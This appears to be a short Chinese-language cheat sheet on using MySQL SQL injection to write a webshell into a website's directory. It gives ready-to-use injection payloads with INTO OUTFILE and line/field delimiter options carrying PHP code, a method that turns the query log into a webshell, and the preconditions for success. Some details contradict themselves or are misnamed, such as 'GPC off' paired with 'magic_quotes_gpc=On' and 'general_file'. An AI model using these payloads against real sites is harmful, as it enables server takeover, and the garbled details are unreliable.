1、写入方式
①、基于outfile写入
union select
例:?id=1 union select '<?php phpinfo() ?>' into outfile '物理路径' ;
###利用分隔符写入
lines terminated by ::设置每行结尾的字符,可以为单个或多个字符,默认值为‘\n’;可以理解为 以每行终止的位置添加 xx 内容。
例:?id=1 into outfile '物理路径' lines terminated by '<?php phpinfo() ?>';
lines starting by :设置每行开头的字符,可以为单个或多个字符,默认情况下不使用任何字符;可以理解为 以每行开始的位置添加 xx 内容。
例:?id=1 into outfile '物理路径' lines starting by '<?php phpinfo() ?>';
fields terminated by :设置字符串为字段之间的分隔符,可以为单个或多个字符,默认情况下为制表符‘\t’;可以理解为 以每个字段的位置添加 xx 内容。
例:?id=1 into outfile '物理路径' fields terminated by '<?php phpinfo() ?>';
columns terminated by :设置字符串为字段之间的分隔符,可以为单个或多个字符,可以理解为以每个字段的位置添加 xx 内容。
例:?id=1 into outfile '物理路径' columns terminated by '<?php phpinfo() ?>';
注:secure_file_priv参数是MySQL用来限制数据导入和导出操作的效果,如果这个参数被设为了一个目录名,那么MySQL会允许仅在这个目录中可以执行文件的导入和导出,例如LOAD DATA、SELECT。。。INTOOUTFILE、LOAD_FILE()等。如果这个参数为NULL,MySQL会禁止导入导出操作,但是这只是意味着通过outfile方法写入WebShell是无法成功的,但是通过导出日志的方法是可以的。
②、基于log日志写入
在日志开启前提下,先将日志文件的导出目录修改成Web目录,然后执行了一次简单的WebShell代码查询功能,此时日志文件记录了此过程,这样再Web目录下的日志文件就变成了WebShell。例如,我们先设置日志文件的导出目录:set global general_file = ‘Web目录’;然后执行一遍:select “WebShell代码”;
2、利用条件
·root 权限
·GPC 关闭(能使用单引号),magic_quotes_gpc=On
·有绝对路径(读文件可以不用,写文件必须)
·没有配置–secure-file-priv
·有读写的权限,有 create、insert、select 的权限